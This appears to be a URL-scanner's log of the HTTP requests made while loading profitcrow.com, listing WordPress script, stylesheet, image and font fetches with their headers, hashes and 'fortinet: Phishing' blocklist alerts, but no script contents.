x-amz-cf-id: mUic7CJjKQ8l7EKhTTSs2LTLaCqnVQUBuxzmfzET4TwSa_LX8na-MA==
via: 1.1 4dde8ec6d6c12741888c2d3a059d4a2e.cloudfront.net (CloudFront), 1.1 476c2ba6d9f6cd69dbcedbd65688cbc0.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:43:28 GMT
age: 1476
etag: "05de7f68103849bd0cd80a704ef97685d0150800"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   12505
Md5:    9443750de7962c9e235cbb6dbda24df0
Sha1:   05de7f68103849bd0cd80a704ef97685d0150800
Sha256: d84e37f9bfd9888a385364c52cdc0d817aa680ee0a83e579ca1f1083f1131468
                                        
                                            GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3688
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6497)
Size:   3688
Md5:    8d388f2c3006f4570ee4c6499d29570d
Sha1:   9bab3f56143a3f3d4da298c4e1f2d7daf9be8b34
Sha256: ff623286211f4f108e8ddd9c9676b67cdaad2b18e4664afb954392ee86e3364c

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/stripe-payments/public/assets/js/stripe-handler-ng.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 21 Mar 2022 05:32:36 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3626
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (365)
Size:   3626
Md5:    2cdc04d78f7ee7a7a45bfa0f71748bba
Sha1:   c02d3f7108cea894457bc649fb8140d1823c4e14
Sha256: ddfe23792f318770019fdf20f4121f4c85796ffd938ff72dceb06d27bc42ec6a

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/twentytwentyone/assets/js/primary-navigation.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Fri, 02 Jul 2021 19:08:57 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3027
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   3027
Md5:    e4a16c411111952ff1102ed8259d2050
Sha1:   f8857129dd5052a2b00ef5faa638fa89ad7ca6be
Sha256: 1e37c3bd3728db033adb56e0dbfb9ba5a0bc5588f0378f50065ddd373f8984a9

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/mediaelement/renderers/vimeo.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 30 Sep 2020 01:23:06 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3373
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6216)
Size:   3373
Md5:    3992e282ab32666818c2d0e616dc1b77
Sha1:   515f5c4dd13f8ef3a887fdcf16b3303ef44c8683
Sha256: ed272ac58e0c1443d08e7b44296b36e9d4063414e38f7ce0afb703cfb194aebc

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/jquery/ui/core.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:31 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 7961
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (8211)
Size:   7961
Md5:    5dd1bc1f3ea8e5e4a837ea607e2b77e3
Sha1:   74211160587dca82bd900ada3516b6c8f0e4efde
Sha256: ed11ec8e4fdd0616ed2b2483fcbff6164ee99c54e310db5cdc4305bbac46832f

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ffad04f54-f199-4bc1-a785-cf5c76640147.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11150
x-amzn-requestid: 0b773c28-feda-41a2-9de6-8b559bd773eb
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLVC5EukoAMFxfA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63813545-3bfe118939abc352072c5af1;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:36:05 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: TpEr70sCNigNhVg7rDFIUG12AVpzC0BUW6-xW3QTvjLcBUrpehjJbQ==
via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 112d82578d402a38d8d02e8b857617e0.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:46:06 GMT
age: 1318
etag: "845842c789e6e97fd1687e668d446bbb8309ffc7"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11150
Md5:    d0f860248042a8499ffb1701a880b2ba
Sha1:   845842c789e6e97fd1687e668d446bbb8309ffc7
Sha256: 9eca5258c7b6e4e145ca6576a3f3791f1324714404ffd7a56a61961f81e7bd44
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fcc7a5b86-3ad1-40c7-b173-8a9ac078c227.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8913
x-amzn-requestid: d0a9414c-eccf-44e8-adb7-92654544eeb5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLWWXEpeIAMFnzw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6381375b-5825510666b3e80a5f83cafa;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:44:59 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: whO__FB0B2ywDP_p63eQ044RXbT207sX1i87I6nPAFUB85nSYc0Cuw==
via: 1.1 00f0a41f749793b9dd653153037c957e.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:46:06 GMT
age: 1318
etag: "0b6c9b51d10762a4747286ab5b1c2354fa39c622"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8913
Md5:    5088223f5973e3cd56f03f50a1e84b79
Sha1:   0b6c9b51d10762a4747286ab5b1c2354fa39c622
Sha256: 8159e4f7eec7bea518bb29e3fdb070bab4fb70116205577f7b7d74ad4d0dfbc7
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F18e649ab-6d56-47c9-ab7e-c65d9bdfcffd.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6789
x-amzn-requestid: eede6332-5376-4f9c-83fc-f894430c1f4b
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLWWYFFgoAMFhaQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6381375b-66d7ffc70f7d901420a503da;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:44:59 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: yM8EHyxy6pUHVZhGUOHuFOU-Z4eTyL2N3Ooa6QMrPlIfp6X5I_JBRw==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 32c16f33c8f5601364fa8229b0d74dc2.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:46:06 GMT
age: 1318
etag: "c47a3884465fc02b5c57faa5ffbd986ba29c64c2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6789
Md5:    926df9839ec3d924b563b55d8bccace8
Sha1:   c47a3884465fc02b5c57faa5ffbd986ba29c64c2
Sha256: a97cd625959aa81bc516024628315b2c6e2ce94f76cd579751a686a6611cc4d2
                                        
                                            GET /wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 11756
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (36864)
Size:   11756
Md5:    4df8270b9bef8842f86ee55d1056915d
Sha1:   e20ebeac9b5bb923a60c8450b2d050830a736312
Sha256: 19954f6aef0c2ea22736d4f24daa47c21a696b1589191b18abe8638d950578e4

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 5772
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (14218)
Size:   5772
Md5:    1f43b2d49313bf72e06ee4c7d3293363
Sha1:   92b34fe1d79f01addcd66101fd4483e47bbd4ac4
Sha256: 2e6a02fd2942f482850fbb250e911d678678dc000a57bccffdfb6907bb2ab2eb

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/header-footer-elementor/inc/js/frontend.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:09:26 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4699
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   4699
Md5:    6e4cb2fa645238bdc0f574672f15a1fa
Sha1:   912a37467b48a43be834cb792383ca762d9c1821
Sha256: 6195b94cd8bcb7324ca47180bcbd1aa7093c8e76756822ecf038a3d04fe16ca6

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4191
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (12220)
Size:   4191
Md5:    6fe5bb96a023659232ce4325f44d33f7
Sha1:   7ec823f8282b61aabfb554822fd1b6c2da4391e0
Sha256: 5d3ce78e4a36a2b30806af6904d874109265da5ae16761f5683e1eb74fb4ab5b

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3313
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (4888)
Size:   3313
Md5:    9c082a8068c41865ef59f1304596126e
Sha1:   6882584706cbfd89a38156a15de51355b467a06f
Sha256: a89a9a40a380cdf15ec7285508d9b188648b3d0b4fcf2027e643b4668e135a08

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/uploads/hummingbird-assets/e49d536499e990405f601b33fd712665.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
x-powered-by: PHP/7.2.34
cache-control: max-age=3600, must-revalidate
hummingbird-cache: Served
content-length: 1140
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text
Size:   1140
Md5:    b8b9e50df0ad408c6ba99ad19a04bec3
Sha1:   2fcf28e9519f5609e4f21a68a185bb3fa10e5bc3
Sha256: 7803fd5ce1d93c86bbcef77bc28276951844c42acf6705226db9085843489467
                                        
                                            GET /wp-content/uploads/pum/pum-site-scripts.js?defer&generated=1641964841&ver=1.16.2 HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 12 Jan 2022 05:20:41 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 17941
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65398)
Size:   17941
Md5:    83c7e8fc21afce24b9b7f13427a94e19
Sha1:   db68ab99deca6b19d33c3f03750e84245a1b4641
Sha256: 7505fda2d6c2b4d8d3a5ce366bd1d08342a66c668b527cb1c67a03461807efe6
                                        
                                            GET /wp-includes/js/mediaelement/mediaelement-and-player.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 30 Sep 2020 01:23:06 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 37603
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65266)
Size:   37603
Md5:    20b247de3bf92a6db16a55d35e84c219
Sha1:   98bfdc1c13085c6d32101e441fdebf71970328d0
Sha256: 14f496c4ead6b1346a50a96bb7f019a3f444c2a5ead00b63c8457c0922fba07b

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/uploads/hummingbird-assets/8dac274b8cd5a47d46ebbe881c0604bb.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
x-powered-by: PHP/7.2.34
cache-control: max-age=3600, must-revalidate
hummingbird-cache: Served
content-length: 1139
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text
Size:   1139
Md5:    af2fb701e56c0a8f6e8d8b9102ea5392
Sha1:   0a649bd36c780499ca515ced85f753985de6b125
Sha256: 71d68c40acd613e9ff3f8cfe1d233c07c35e4623c49ed0ddc54059806c24c660
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/lora/v26/0QIvMX1D_JOuMwr7Iw.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://profitcrow.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 35660
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 23 Nov 2022 08:03:57 GMT
expires: Thu, 23 Nov 2023 08:03:57 GMT
cache-control: public, max-age=31536000
age: 223448
last-modified: Mon, 15 Aug 2022 18:07:59 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 35660, version 1.0\012- data
Size:   35660
Md5:    0d0d3e5824e5e67a9e993960df2b67a9
Sha1:   328d67bb1d5899a7809df9f4385181863fd035f1
Sha256: 38da98e06ba18c4204f547d30572cd81a2dd3fd5438d306856d2617480ee8639
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Cache-Control: public, max-age=14400
